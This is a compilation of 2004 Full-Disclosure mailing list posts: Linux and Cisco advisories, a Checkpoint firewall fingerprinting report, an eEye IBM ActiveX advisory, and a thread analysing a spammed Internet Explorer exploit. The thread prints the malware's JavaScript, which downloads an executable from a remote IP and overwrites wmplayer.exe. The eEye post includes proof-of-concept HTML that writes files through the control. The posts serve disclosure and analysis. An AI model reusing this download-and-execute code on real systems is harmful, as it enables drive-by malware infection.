[Full-Disclosure] Akamai DoS - insider job?
http://www.overclockersclub.com/?read=8733819 The Akamai attacks started in the morning and it was detected by Keynote Systems, a web tracking company that is able to track the load and bandwidth on the Internet. According to Keynote they saw an Internet performance issue this morning ... They have tracked the attacker back to person that is at the Akamai Technologies ISP. No other information has been given to us at this time. We do not know if the FBI is working on this issue right now, but we expect them to do so. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] spamming trojan?
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Multiple Antivirus Scanners DoS attack.
*DrWeb (http://www.drweb.ru/) *AVG v7.0.251 *ClamAV version 0.70, 0.72 --- please confirm this! *eTrust InoculateIT version 6.0 Are vulnerable. ClamAV is not vulnerable and hasn't been for a long time (at least since 0.6x IIRC). Just try it: $ clamscan SERVER_dwn.zip SERVER_dwn.zip: Oversized.Zip FOUND -- Luca Gibelli ([EMAIL PROTECTED]) - http://www.ClamAV.net - A GPL virus scanner PGP Key Fingerprint: C782 121E 8C3A 90E3 7A87 D802 6277 8FF4 5EFC 5582 PGP Key Available on: Key Servers || http://www.clamav.net/gpg/nervoso.gpg ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] spamming trojan?
On Wed, 16 Jun 2004 08:23:59, [EMAIL PROTECTED] wrote: Anyone want to try and analyze what this thing is? It was spammed to about 30 addresses here this morning. The end stage appears to be a new variant of the Cjdra proxy trojan. This person has been spreading trojans via spammed-exploit for a while now, and now it looks as if he/she has upgraded to the latest IE exploit. http://vil.nai.com/vil/content/v_100939.htm describes an older variant. -Joe -- Joe Stewart, GCIH Senior Security Researcher LURHQ http://www.lurhq.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] spamming trojan?
The end stage appears to be a new variant of the Cjdra proxy trojan. This person has been spreading trojans via spammed-exploit for a while now, and now it looks as if he/she has upgraded to the latest IE exploit. Am I correct in assuming that this is using the as yet still unpatched IE exploit and that this is a little more serious than installing adware? Where the heck are Microsoft and Scot Information Anarchy Culp and the Trusted Computing Forum now? Don't be blaming customers for not visiting windows update this time. Geo. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] SUSE Security Announcement: kernel (SuSE-SA:2004:017)
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:kernel Announcement-ID:SuSE-SA:2004:017 Date: Wednesday, Jun 16th 2004 15:20 MEST Affected products: 8.0, 8.1, 8.2, 9.0, 9.1 SuSE Linux Database Server, SuSE eMail Server III, 3.1 SuSE Linux Enterprise Server 7, 8 SuSE Linux Firewall on CD/Admin host SuSE Linux Connectivity Server SuSE Linux Office Server Vulnerability Type: local denial-of-service attack Severity (1-10):4 SUSE default package: no Cross References: CAN-2004-0554 Content of this advisory: 1) security vulnerability resolved: - floating point exception causes system crash problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - icecast - sitecopy - cadaver - OpenOffice_org - tripwire - postgresql - lha - XDM - mod_proxy 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information The Linux kernel is vulnerable to a local denial-of-service attack. By using a C program it is possible to trigger a floating point exception that puts the kernel into an unusable state. To execute this attack a malicious user needs shell access to the victim's machine. The severity of this bug is considered low because local denial-of- service attacks are hard to prevent in general. Additionally the bug is limited to x86 and x86_64 architecture. SPECIAL INSTALL INSTRUCTIONS: == The following paragraphs will guide you through the installation process in a step-by-step fashion. The character sequence marks the beginning of a new paragraph. In some cases, the steps outlined in a particular paragraph may or may not be applicable to your situation. Therefore, please make sure to read through all of the steps below before attempting any of these procedures. All of the commands that need to be executed are required to be run as the superuser (root). Each step relies on the steps before it to complete successfully. Note: The update packages for the SuSE Linux Enterprise Server 7 (SLES7) are being tested at the moment and will be published as soon as possible. Step 1: Determine the needed kernel type Please use the following command to find the kernel type that is installed on your system: rpm -qf /boot/vmlinuz Following are the possible kernel types (disregard the version and build number following the name separated by the - character) k_deflt # default kernel, good for most systems. k_i386# kernel for older processors and chipsets k_athlon # kernel made specifically for AMD Athlon(tm) family processors k_psmp# kernel for Pentium-I dual processor systems k_smp # kernel for SMP systems (Pentium-II and above) k_smp4G # kernel for SMP systems which supports a maximum of 4G of RAM kernel-64k-pagesize kernel-bigsmp kernel-default kernel-smp Step 2: Download the package for your system Please download the kernel RPM package for your distribution with the name as indicated by Step 1. The list of all kernel rpm packages is appended below. Note: The kernel-source package does not contain a binary kernel in bootable form. Instead, it contains the sources that the binary kernel rpm packages are created from. It can be used by administrators who have decided to build their own kernel. Since the kernel-source.rpm is an installable (compiled) package that contains sources for the linux kernel, it is not the source RPM for the kernel RPM binary packages. The kernel RPM binary packages for the distributions can be found at the locations below ftp://ftp.suse.com/pub/suse/i386/update/. 8.0/images/ 8.1/rpm/i586 8.2/rpm/i586 9.0/rpm/i586 9.1/rpm/i586 After downloading the kernel RPM package for your system, you should verify the authenticity of the kernel rpm package using the methods as listed in section 3) of each SUSE Security Announcement. Step 3: Installing your kernel rpm package Install the rpm package that you have downloaded in Steps 3 or 4 with the command rpm -Uhv
[Full-Disclosure] [ GLSA 200406-11 ] Horde-IMP: Input validation vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200406-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Horde-IMP: Input validation vulnerability Date: June 16, 2004 Bugs: #53862 ID: 200406-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An input validation vulnerability has been discovered in Horde-IMP. Background == Horde-IMP is the Internet Messaging Program. It is written in PHP and provides webmail access to IMAP and POP3 accounts. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 net-www/horde-imp = 3.2.3 = 3.2.4 Description === Horde-IMP fails to properly sanitize email messages that contain malicious HTML or script code. Impact == By enticing a user to read a specially crafted e-mail, an attacker can execute arbitrary scripts running in the context of the victim's browser. This could lead to a compromise of the user's webmail account, cookie theft, etc. Workaround == There is no known workaround at this time. Resolution == All Horde-IMP users should upgrade to the latest stable version: # emerge sync # emerge -pv =horde-imp-3.2.4 # emerge =horde-imp-3.2.4 References == [ 1 ] Bugtraq Announcement http://www.securityfocus.com/bid/10501 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200406-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 pgpcCMYcRcjpH.pgp Description: PGP signature
Re: [Full-Disclosure] spamming trojan?
On Wed, 2004-06-16 at 08:23, Geo. wrote:
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
Here's the contents:
var x = new ActiveXObject(Microsoft.XMLHTTP);
x.Open(GET, http://219.234.95.124/vbox/w_e_d.exe,0);
x.Send();
var s = new ActiveXObject(ADODB.Stream);
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(C:\\Program Files\\Windows Media Player\\wmplayer.exe,2);
location.href = mms://;
so whatever w_e_d.exe is...
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Cisco Security Advisory: Cisco IOS Malformed BGP packet causes reload
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS Malformed BGP Packet Causes Reload Revision 1.0 Last Updated June 16 15:00 UTC (GMT) For Public Release 2004 June 16 15:00 UTC (GMT) - --- Please provide your feedback on this document. - --- Contents Summary Affected Products Details Impact Software Versions and Fixes Obtaining Fixed Software Workarounds Exploitation and Public Announcements Status of This Notice: FINAL Distribution Revision History Cisco Security Procedures - --- Summary === A Cisco device running IOS and enabled for the Border Gateway Protocol (BGP) is vulnerable to a Denial of Service (DOS) attack from a malformed BGP packet. The BGP protocol is not enabled by default, and must be configured in order to accept traffic from an explicitly defined peer. Unless the malicious traffic appears to be sourced from a configured, trusted peer, it would be difficult to inject a malformed packet. Cisco has made free software available to address this problem. This advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20040616-bgp.shtml. Affected Products = Vulnerable Products This issue affects all Cisco devices running any unfixed version of Cisco IOS code and configured for BGP routing. A router which is running the BGP process will have a line in the config defining the AS number, which can be seen by issuing the command show running-config: router bgp AS number This vulnerability is present in any unfixed version of IOS, from the beginning of support for the BGP protocol, including versions 9.x, 10.x, 11.x and 12.x. To determine the software running on a Cisco product, log in to the device and issue the show version command to display the system banner. Cisco IOS software will identify itself as Internetwork Operating System Software or simply IOS ®. On the next line of output, the image name will be displayed between parentheses, followed by Version and the IOS release name. Other Cisco devices will not have the show version command or will give different output. The following example identifies a Cisco product running IOS release 12.0(3) with an installed image name of C2500-IS-L: Cisco Internetwork Operating System Software IOS (TM) 2500 Software (C2500-IS-L), Version 12.0(3), RELEASE SOFTWARE The release train label is 12.0. The next example shows a product running IOS release 12.0(2a)T1 with an image name of C2600-JS-MZ: Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-JS-MZ), Version 12.0(2a)T1, RELEASE SOFTWARE (fc1) Additional information about Cisco IOS release naming can be found at http://www.cisco.com/warp/public/620/1.html. Products Confirmed Not Vulnerable Products confirmed not to be vulnerable include devices which cannot participate in BGP or cannot be configured for BGP. Details === The Border Gateway Protocol (BGP) is a routing protocol defined by RFC 1771, and designed to manage IP routing in large networks. An affected Cisco device running a vulnerable version of Cisco IOS software and enabling the BGP protocol will reload when a malformed BGP packet is received. BGP runs over TCP, a reliable transport protocol which requires a valid three way handshake before any further messages will be accepted. The Cisco IOS implementation of BGP requires the explicit definition of a neighbor before a connection can be established, and traffic must appear to come from that neighbor. These implementation details make it very difficult to send a BGP packet to a Cisco IOS device from an unauthorized source. A Cisco device receiving an invalid BGP packet will reset and may take several minutes to become fully functional. This vulnerability may be exploited repeatedly resulting in an extended DOS attack. This issue is documented in bug IDs CSCdu53656 and CSCea28131. Impact == Successful exploitation of this vulnerability results in a reload of the device. Repeated exploitation could result in a sustained DoS attack. Software Versions and Fixes === Note: Many of the releases in this table were fixed prior to the release of other IOS advisories. Read the table carefully to determine if your IOS release contains these fixes. Most fixed releases for the TCP and SNMP advisories such as http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml and http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml contained the fixes for this BGP advisory. Each row of the Cisco IOS software table (below) describes a release train and the platforms or products for which it is intended. If a given release train
[Full-Disclosure] [ GLSA 200406-12 ] Webmin: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200406-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Webmin: Multiple vulnerabilities Date: June 16, 2004 Bugs: #53375 ID: 200406-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Webmin contains two security vulnerabilities which could lead to a Denial of Service attack and information disclosure. Background == Webmin is a web-based administration tool for Unix. It supports a wide range of applications including Apache, DNS, file sharing and others. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-admin/webmin = 1.140-r1= 1.150 Description === Webmin contains two security vulnerabilities. One allows any user to view the configuration of any module and the other could allow an attacker to lock out a valid user by sending an invalid username and password. Impact == An authenticated user could use these vulnerabilities to view the configuration of any module thus potentially obtaining important knowledge about configuration settings. Furthermore an attacker could lock out legitimate users by sending invalid login information. Workaround == There is no known workaround at this time. Resolution == All Webmin users should upgrade to the latest stable version: # emerge sync # emerge -pv =app-admin/app-admin/webmin-1.150 # emerge =app-admin/app-admin/webmin-1.150 References == [ 1 ] Bugtraq Announcement http://www.securityfocus.com/bid/10474 [ 2 ] Webmin Changelog http://www.webmin.com/changes-1.150.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200406-12.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 pgpot4dA9GlKF.pgp Description: PGP signature
RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
AMEN!!! Preach it, brother! Best regards, Bill Cerynik Managing Partner VC Consulting LLC 973.616.8170 [EMAIL PROTECTED] http://www.vcconsulting.biz Bringing open source solutions to the real world Message: 12 Date: Tue, 15 Jun 2004 14:52:11 -0400 From: Len Rose [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Administrivia: Classical Rant ATTENTION LAMERS Speaking for myself only, something has to be done about the quality of the information, and the standards of netiquette on this list. We all don't need to see mindlesS banter, and other noise spewing back and forth. If you can, please try to not post this spewage to the list, but instead send mail to each other (after carefully cutting and pasting on your windows desktop) If you must send it to the list it must be in terms of technical content, whether it is of a real security issue and not if Yahoo will increase your disk space or what slashdorks posted about something that was known since 2 months ago. I use the word technical loosely as in my mind, anything security related is inherently technical even if it/is not actually dealing with code or networks or systems. I'm very sick of seeing the amount of lame crap on this list, and I imagine a great deal of others are too. Thanks for listening. PS Unlike other reputable lists, we try not to censor anyone if they at least subscribe and never hit the queue. Lately we default to delete and try to approve those people who insist on posting without subscribing, or posting from a non-subscribed address. If reputable means bugtraq or cert then beat me with a stick. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Antivirus/trojan
It is the Win32/Zafi.B worm. one step at a time... Find local movie times and trailers on Yahoo! Movies.
Re: [Full-Disclosure] spamming trojan?
--On Wednesday, June 16, 2004 08:23:59 AM -0400 Geo.
[EMAIL PROTECTED] wrote:
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;di
alo gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
All this does is call more functions:
function getRealShell() {
myiframe.document.write(SCRIPT
SRC='http://219.234.95.124/vbox/shellscript.js'\/SCRIPT);
}
document.write(IFRAME ID=myiframe SRC='about:blank' WIDTH=200
HEIGHT=200/IFRAME);
setTimeout(getRealShell(),100);
The real action is at the RealShell address:
var x = new ActiveXObject(Microsoft.XMLHTTP);
x.Open(GET, http://219.234.95.124/vbox/w_e_d.exe,0);
x.Send();
var s = new ActiveXObject(ADODB.Stream);
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(C:\\Program Files\\Windows Media Player\\wmplayer.exe,2);
location.href = mms://;
The rest should be fairly obvious from the above code.
Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Akamai
--On Wednesday, June 16, 2004 11:53:23 AM +1000 Darren Reed [EMAIL PROTECTED] wrote: This is a whole new play ground for organised crime, mostly thanks to Microsoft. You've got millions of PC's around the world that are largely, in one way or another, susceptible to computer virii, making them open targets for use as minions. And the perfect seed for spreading them is the databases of email addresses used by spammers... If networks simply took responsibility for the traffic that comes from them, this problem wouldn't exist. It's completely trivial to find infected hosts on a network through passive monitoring. They should then be disconnected until they are properly cleaned and secured. Unless networks begin doing this routinely (including ISPs), legislation will be introduced to solve the problem, and then we will all be much worse off. There's nothing like a law to completely screw things up. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!
The shell code is located at
http://219.234.95.124/vbox/shellscript.js
and Macafee points it out as:
VBS/Psyme - Trojan
-Pratik
Geo. [EMAIL PROTECTED] 6/16/2004 7:22:48 AM
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] spamming trojan?
I used PE Explorer.
Looks the june4.exe is some kind of spyware. It reference to another
site cjdra.com, possibly uploading user information there.
I just started learning assembly, please pardon my lack of knowledge on
reverse engineering.
J
Michael Gargiullo wrote:
On Wed, 2004-06-16 at 13:41, joe smith wrote:
The file is UPX packed and withit the file there is another GET
pointing to http://219.234.95.124/june4.exe;
J
Like those Chinese stacking dolls... How'd you unpack it?
Michael Gargiullo wrote:
On Wed, 2004-06-16 at 08:23, Geo. wrote:
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
Here's the contents:
var x = new ActiveXObject(Microsoft.XMLHTTP);
x.Open(GET, http://219.234.95.124/vbox/w_e_d.exe,0);
x.Send();
var s = new ActiveXObject(ADODB.Stream);
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(C:\\Program Files\\Windows Media Player\\wmplayer.exe,2);
location.href = mms://;
so whatever w_e_d.exe is...
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability
You all might want to take a look at Americas best kept secret, security for wireless internet (we have been doing it for 5 years)would truly value your opinion. Bob Walton 877-326-5990 [EMAIL PROTECTED] -Original Message- From: Thierry Carrez [mailto:[EMAIL PROTECTED] Sent: Tuesday, June 15, 2004 3:14 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200406-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Gallery: Privilege escalation vulnerability Date: June 15, 2004 Bugs: #52798 ID: 200406-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis There is a vulnerability in the Gallery photo album software which may allow an attacker to gain administrator privileges within Gallery. Background == Gallery is a web application written in PHP which is used to organize and publish photo albums. It allows multiple users to build and maintain their own albums. It also supports the mirroring of images on other servers. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-misc/gallery = 1.4.3_p1 = 1.4.3_p2 Description === There is a vulnerability in the Gallery photo album software which may allow an attacker to gain administrator privileges within Gallery. A Gallery administrator has full access to all albums and photos on the server, thus attackers may add or delete photos at will. Impact == Attackers may gain full access to all Gallery albums. There is no risk to the webserver itself, or the server on which it runs. Workaround == There is no known workaround at this time. All users are encouraged to upgrade to the latest available version. Resolution == All users should upgrade to the latest available version of Gallery. # emerge sync # emerge -pv =app-misc/gallery-1.4.3_p2 # emerge =app-misc/gallery-1.4.3_p2 References == [ 1 ] Gallery Announcement http://gallery.menalto.com/modules.php?op=modloadname=Newsfile=articlesid =123mode=threadorder=0thold=0 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200406-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAz0qMvcL1obalX08RAmuoAKCKcyWXNtt+mdgtX26R9l96V8yE4QCfVFQG 9s9GiyiY83X/VHcx2Kc+mQQ= =+z9+ -END PGP SIGNATURE- email intro letter.doc Description: MS-Word document
[Full-Disclosure] Checkpoint Firewall-1 IKE Vendor ID information leakage
Checkpoint Firewall-1 IKE Vendor ID information leakage Introduction: Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will return an IKE Vendor ID payload when it receives an IKE packet with a specific Vendor ID payload. The Vendor ID payload that is returned identifies the system as Checkpoint Firewall-1 and also determines the Firewall-1 version and service-pack or feature-pack revision number. This is an information leakage issue which can be used to fingerprint the Firewall-1 system. This information leakage issue has been verified for Checkpoint Firewall-1 versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1 version 4.0 is not vulnerable because it does not return any Vendor ID payload, and Firewall-1 versions 3.0b and earlier are not vulnerable because they do not support IPsec VPN. However, most people are running either NG or 4.1 and therefore this issue will apply to most Firewall-1 installations that have IPsec VPN enabled. I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover and demonstrate this issue. Full details are available at: http://www.nta-monitor.com/news/checkpoint2004/index.htm Details: If an IKE Phase-1 packet with a Vendor ID payload containing the data f4ed19e0c114eb516faaac0ee37daf2807b4381f (20 bytes of binary data encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1 or higher which supports IKE, the Firewall will respond with a Vendor ID payload containing data which identifies it as a Checkpoint Firewall-1 system, provides details about the version of the Firewall software, and contains some additional information. The data that is returned in the Vendor ID payload from the Firewall consists of the same 20-byte sequence that was sent (f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes of data that contains the encoded version number and some other details that appear to contain details of the Firewall's capabilities. I presume that the 20-byte magic string is an SHA1 hash of something. I'd be interested to find out what source string hashes to this value. Looking at all versions of Firewall-1 from 4.1 base (no service pack) to NG AI R55 (latest current version), I have found the following returned Vendor ID payloads. In the payloads below, a dot (.) represents an arbitary hex digit: Firewall-1 4.1 Base (no service pack) f4ed19e0c114eb516faaac0ee37daf2807b4381f00010002 Firewall-1 4.1 SP1 f4ed19e0c114eb516faaac0ee37daf2807b4381f00010003 Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID) f4ed19e0c114eb516faaac0ee37daf2807b4381f00010fa2 [EMAIL PROTECTED] [537]$ [EMAIL PROTECTED] [537]$ [EMAIL PROTECTED] [537]$ [EMAIL PROTECTED] [537]$ cat ,, [Note to moderator: I notified Checkpoint of this issue on 13th April 2004, but have not received any response apart from a We've received your Email auto-reply.] Introduction: Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will return an IKE Vendor ID payload when it receives an IKE packet with a specific Vendor ID payload. The Vendor ID payload that is returned identifies the system as Checkpoint Firewall-1 and also determines the Firewall-1 version and service-pack or feature-pack revision number. This is an information leakage issue which can be used to fingerprint the Firewall-1 system. This information leakage issue has been verified for Checkpoint Firewall-1 versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1 version 4.0 is not vulnerable because it does not return any Vendor ID payload, and Firewall-1 versions 3.0b and earlier are not vulnerable because they do not support IPsec VPN. However, most people are running either NG or 4.1 and therefore this issue will apply to most Firewall-1 installations that have IPsec VPN enabled. I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover and demonstrate this issue. Full details are available at: http://www.nta-monitor.com/news/checkpoint2004/index.htm Details: If an IKE Phase-1 packet with a Vendor ID payload containing the data f4ed19e0c114eb516faaac0ee37daf2807b4381f (20 bytes of binary data encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1 or higher which supports IKE, the Firewall will respond with a Vendor ID payload containing data which identifies it as a Checkpoint Firewall-1 system, provides details about the version of the Firewall software, and contains some additional information. The data that is returned in the Vendor ID payload from the Firewall consists of the same 20-byte sequence that was sent (f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes of data that contains the encoded version number and some other details that appear to contain details of the Firewall's capabilities. I presume that the 20-byte magic string is an SHA1 hash of something. I'd be interested
[Full-Disclosure] IBM Access Support (eGatherer) Activex Dangerous Methods Vulnerability
IBM Access Support (eGatherer) Activex Dangerous Methods Vulnerability Release Date: June 15, 2004 Date Reported: February 20, 2004 Patch Development Time (In Days): 116 Severity: High (Remote Code Execution) Vendor: IBM Systems Affected: IBM Access Support (eGatherer) Activex Version 2.0.0.16 Overview: eEye Digital Security has discovered a security vulnerability in IBM's signed eGatherer activex. Because this application is signed, it might be presented to users on the web for execution in the name of IBM. If users trust IBM, they will run this, and their systems will be compromised. This activex was designed by IBM to be used for an automated support solution for their PC's. This is installed by default on many popular IBM PC models. The issue is quite simple. Activex is a very profound web technology. As a profound web technology it may be abused. Designers might create an activex which could perform any function on an user's computer. Microsoft relies on trust for the security model and warns against making activex with dangerous capabilities. The responsibility, however, rests with the creator of the activex, as in any trust model. In this case, IBM made available methods named such as GetMake, GetModel, GetOSName, SetDebugging (accepting variable called filename) and RunEgatherer (also accepting suspicious parameter). These dangerous methods were found to be able to write a trojan file to the user's startup folder through a difficult trick. It should be further noted that both SetDebugging and RunEgether methods allow a web page author to write files of their choice (though the content is limited) to the victim's hard drive -- anywhere to their hard drive. These are the default and clearly stated usage of these methods. Technical Details: For clarification purposes this will be presented as a two page attack, though it may easily be a single HTML page attack. ---EXAMPLE HTML 1 - //first this page would be viewed, then through refreshing or whatever one goes to the second page (or just timing the two calls with SetTimeOUt and putting them on the same page...) |object classid=clsid:74FFE28D-2378-11D5-990C-006094235084 id=X| |object| |script| X.SetDebugging(/../xx.hta,-1); |script| - ---EXAMPLE HTML 2 - |object classid=clsid:74FFE28D-2378-11D5-990C-006094235084 id=X| |object| |script| X.SetDebugging(/../xiframe src=http://www.malware.comx.hta,-1); |script| - In the above example, we see the object called utilizing the object tag. The codebase tag [not shown here] is used by the browser to initiate the install of the activex if it is not already existing on the system. This would bring up the activex prompt which essentially asks the user if they trust IBM. Finally, the object is named X, so we might reference it later in script and use its' dangerous methods. In the first page we call the SetDebugging method. SetDebugging writes a file called xx.hta to the C:\ drive. (An attacker would probably write the file to the StartUP folder in real life.) This file will have xx.hta written inside of it, along with some other stuff. We need to control what is written inside the file so we can write 